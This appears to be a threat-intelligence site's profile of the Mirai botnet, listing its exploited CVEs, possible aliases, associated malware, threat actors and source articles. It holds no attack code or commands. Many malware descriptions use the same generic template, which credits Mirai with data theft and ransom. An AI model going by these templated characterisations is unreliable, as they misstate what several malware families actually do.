Mirai Botnet

Malware Profile Updated 12 days ago
Download STIX
Preview STIX
The Mirai botnet is a type of malware, malicious software designed to exploit and harm computer systems. It spreads by exploiting vulnerabilities in different systems, most notably through Ivanti Connect Secure bugs and the JAWS Webserver. Once inside a system, it can steal personal information, disrupt operations, or hold data hostage for ransom. The Mirai botnet is infamous for its ability to create large-scale botnets, networks of infected devices used to perform coordinated attacks. In Q1 2022, detections of the Mirai botnet family in Hong Kong dropped by 9% quarter-over-quarter. However, this decline does not necessarily signal an end to the threat posed by the Mirai botnet. The malware continues to evolve, finding new ways to infiltrate systems and spread. For instance, it was discovered that the botnet was exploiting three old vulnerabilities in the JAWS Webserver (CVE-2016-20016, CVE-2018-10561/10562, and CVE-2017-17215) for propagation purposes. More recently, researchers from Juniper Threat Labs reported that threat actors were exploiting newly disclosed Ivanti Connect Secure (ICS) vulnerabilities (CVE-2023-46805 and CVE-2024-21887) to drop the payload of the Mirai botnet. This latest development underscores the ever-evolving landscape of cyber threats and the persistent danger posed by the Mirai botnet. As such, continuous vigilance and regular system updates are crucial to protect against these kinds of threats.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Gafgyt
3
Gafgyt, also known as Bashlite, is a form of malware that infects Linux architecture operating systems to launch Distributed Denial of Service (DDoS) attacks. The malware infiltrates systems through suspicious downloads, emails, or websites, and once inside, it can steal personal information, disrup
Gafgyt Variant
2
The Gafgyt variant is a malicious software that poses a significant threat to computer systems and devices. This malware can infiltrate your system through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it has the potential to steal personal information,
Moobot
2
Moobot is a malicious software (malware) that has been causing significant disruption in the digital world. The malware, which can infiltrate systems through various methods such as suspicious downloads, emails, or websites, is known for its capability to steal personal information, disrupt operatio
Miori
1
Miori is a variant of the notorious Mirai malware, which shares similar modules with it. Like other types of malware, Miori is designed to exploit and damage computer systems, often infiltrating them through suspicious downloads, emails, or websites. Once it has infected a system, it can steal perso
Agoent
1
AGoent is a sophisticated malware, a malicious software designed to exploit and damage computer systems. This Golang-based agent bot has been observed in multiple attacks, exploiting a year-old vulnerability to launch various nefarious activities. It operates by fetching the script file "exec.sh" fr
skid.x86
1
None
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Botnet
Malware
Vulnerability
Ddos
Linux
Exploit
Zero Day
Akamai
Minecraft
Ransomware
Android
t1583.005
Fortiguard
DNS
Hackread
Retail
CISA
Phishing
SSH
Exploits
Apache
Azure
Esxi
Bitcoin
Aws
Ics
Chrome
Vpn
Wordpress
Zyxel
Malwarebytes
Ivanti
Tp
Fortinet
Ddos Botnet
Worm
Wiper
Trojan
Backdoor
Payload
Bot
Zero Day
Denial of Se...
Fbi
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
MiraiUnspecified
13
Mirai is a type of malware that primarily targets Internet of Things (IoT) devices to form botnets, which are networks of private computers infected with malicious software and controlled as a group without the owners' knowledge. In early 2022, Mirai botnets accounted for over 7 million detections g
KinsingUnspecified
1
Kinsing is a type of malware, short for malicious software, that is designed to exploit and damage computer systems or devices. It typically infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it can steal personal information, disrupt o
Mozi BotnetUnspecified
1
The Mozi botnet, a form of malware, wreaked havoc on the internet from 2019 to 2023. During this period, it became the largest botnet in existence, incorporating over 1.5 million unique devices into its network. The botnet primarily exploited known vulnerabilities in NETGEAR DGN devices and JAWS web
MoziUnspecified
1
Mozi is a type of malware, a malicious software designed to exploit and damage computer systems or devices. It can infiltrate systems via suspicious downloads, emails, or websites, often unbeknownst to the user. Once it gains access, Mozi has the potential to steal personal information, disrupt oper
PLEADUnspecified
1
The PLEAD malware is a malicious software that was discovered by ESET researchers in 2019 to be utilized by the Chinese APT group known as BlackTech. The group was found to be performing Man-in-the-Middle (MitM) attacks through compromised ASUS routers and delivering the PLEAD malware through ASUS W
NoabotUnspecified
1
NoaBot is a sophisticated malware variant that primarily targets Linux systems, utilizing a cryptominer to exploit system resources. It is based on the Mirai botnet, a notorious malware strain known for its ability to compromise Internet of Things (IoT) devices. NoaBot has most of the capabilities o
WannaCryUnspecified
1
WannaCry is a type of malware, specifically ransomware, that caused significant global disruption in 2017. It exploited Windows SMBv1 Remote Code Execution Vulnerabilities (CVE-2017-0144, CVE-2017-0145, CVE-2017-0143), which allowed it to spread rapidly and infect over 200,000 machines across more t
LockbitUnspecified
1
LockBit is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. It can enter your system through various channels such as suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
TunnelvisionUnspecified
1
TunnelVision is a potent malware that has been making headlines for its ability to bypass VPN encapsulation. This malicious software, designed to exploit and damage computer systems, infiltrates through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside a syst
KiraibotUnspecified
1
KiraiBot is a recent and active malware, identified as part of the Mirai botnet variant family in September 2023 by NSFOCUS's global threat hunting system. It is one of several new botnet variants developed based on the Mirai source code, alongside hailBot and catDDoS. However, kiraiBot is unique in
CatddosUnspecified
1
CatDDoS, a variant of the Mirai distributed denial-of-service (DDoS) botnet, is a potent malware threat that has been compromising more than 300 targets daily in its latest wave of attacks. The malware infects systems through suspicious downloads, emails, or websites and can disrupt operations, stea
CondiUnspecified
1
Condi is a relatively new botnet, a type of malware, that has been exploiting unpatched TP-Link routers to spread and execute malicious activities. Identified by FortiGuard Labs, the Condi botnet leverages the vulnerability CVE-2023-1389 to gain control of devices. It was first advertised through a
Jenx MiraiUnspecified
1
JenX Mirai is a variant of malware, malicious software designed to exploit and damage computer systems. This particular variant was discovered in January 2018 and has been used primarily by the InfectedSlurs botnet, an unidentified group that uses offensive language in its command-and-control (C2) d
InfectedslursUnspecified
1
InfectedSlurs is a newly discovered malware that operates as a Mirai-based botnet. This malicious software is designed to exploit and damage computer systems and devices, often infiltrating the system through suspicious downloads, emails, or websites without the user's knowledge. Once inside, it can
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
MedusaUnspecified
1
Medusa, a threat actor group, has been identified as a rising menace in the cybersecurity landscape, with its ransomware activities escalating significantly. In November 2023, Medusa and other groups like LockBit and ALPHV (BlackCat) exploited a zero-day vulnerability known as Citrix Bleed (CVE-2023
SandwormUnspecified
1
Sandworm, a threat actor linked to Russia, has been implicated in numerous high-profile cyber attacks. This group's activities have primarily targeted Ukraine, compromising the country's critical infrastructure and telecommunications providers. The Sandworm group is known for its fileless attack met
APT28Unspecified
1
APT28, also known as Fancy Bear, is a threat actor linked to Russia and has been involved in numerous cyber espionage campaigns. The group is notorious for its sophisticated tactics, techniques, and procedures (TTPs). Recently, NATO and the EU formally condemned APT28's activities, acknowledging the
Unc5221Unspecified
1
UNC5221, a threat actor linked to China, has been identified as the group behind recent cyberattacks involving new malware specifically designed to exploit vulnerabilities in Ivanti Connect Secure VPN and Policy Secure devices. The discovery was made by Mandiant researchers who observed the deployme
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
CVE-2023-1389Unspecified
6
CVE-2023-1389 is a significant software vulnerability, specifically a command injection flaw, found in TP-Link Archer AX21 routers. The flaw was publicly released in March of this year and has since been exploited by malicious actors to gain unauthorized access to devices. Attack traffic through the
CVE-2023-28771Unspecified
1
CVE-2023-28771 is a software vulnerability, specifically a command injection flaw, in Zyxel ZyWALL firewalls. The vulnerability was detected by FortiGuard Labs in June 2023 when it was being exploited by several Distributed Denial of Service (DDoS) botnets. It's worth noting that this vulnerability
CVE-2023-26801Unspecified
1
None
CVE-2023-46805Unspecified
1
CVE-2023-46805 is a significant software vulnerability discovered in the web component of all supported versions of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x). This flaw, which allows for authentication bypass, was first brought to the attention of the Cyber Centre on Jan
CVE-2024-21887Unspecified
1
CVE-2024-21887 is a command injection vulnerability identified in the web components of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x). This flaw was publicly disclosed on January 10, 2024, alongside an authentication bypass vulnerability (CVE-2023-46805), affecting the same
CVE-2016-20016Unspecified
1
CVE-2016-20016 is a significant software vulnerability identified in MVPower CCTV DVR systems. This flaw, known as a remote code execution vulnerability, allows unauthorized users to execute arbitrary code on the system remotely, potentially leading to full system compromise. The vulnerability, also
CVE-2018-10561Unspecified
1
None
CVE-2017-17215Unspecified
1
CVE-2017-17215 is a significant vulnerability found in Huawei HG532 routers, characterized as a flaw in software design or implementation. This vulnerability has been exploited to distribute malware through exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Hua
CVE-2023-49606Unspecified
1
None
CVE-2024-3273Unspecified
1
None
CVE-2022-29303Unspecified
1
None
Source Document References
Information about the Mirai Botnet Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
Securityaffairs
6 days ago
Security Affairs Malware Newsletter - Round 3
Securityaffairs
6 days ago
Security Affairs Malware Newsletter - Round 3
Securityaffairs
12 days ago
Security Affairs Malware Newsletter - Round 2
Securityaffairs
20 days ago
Security Affairs Malware Newsletter - Round 1
Securityaffairs
a month ago
Security Affairs newsletter Round 478 by Pierluigi Paganini – INTERNATIONAL EDITION
InfoSecurity-magazine
a month ago
Cyber Attackers Turn to Cloud Services to Deploy Malware
Securityaffairs
a month ago
Security Affairs newsletter Round 477 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs
a month ago
Security Affairs newsletter Round 476 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs
2 months ago
Security Affairs newsletter Round 473 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs
2 months ago
Security Affairs newsletter Round 471 by Pierluigi Paganini – INTERNATIONAL EDITION
Securityaffairs
3 months ago
Mirai botnet also spreads through the exploitation of Ivanti Connect Secure bugs
CERT-EU
10 months ago
Where Linux is in your home, and how to protect Linux devices from hacking
CERT-EU
10 months ago
Are your smart lightbulbs spying on you? - Panda Security
CERT-EU
a year ago
SYN Flood Explained. How to Prevent this Attack from Taking over your Server
CERT-EU
a year ago
Samsung Phone Flaws Added to CISA ‘Must Patch’ List Likely Exploited by Spyware Vendor
CERT-EU
a year ago
AndoryuBot DDoS Botnet Exploiting Ruckus AP Vulnerability
DARKReading
a year ago
Mirai Common Attack Methods Remain Consistent, Effective
Malwarebytes
a year ago
Port scan attacks: Protecting your business from RDP attacks and Mirai botnets
CERT-EU
a year ago
History of Computer Hacking and Cybersecurity Threats: From the 50s to Today | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #ransomware – National Cyber Security Consulting
Unit42
a year ago
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits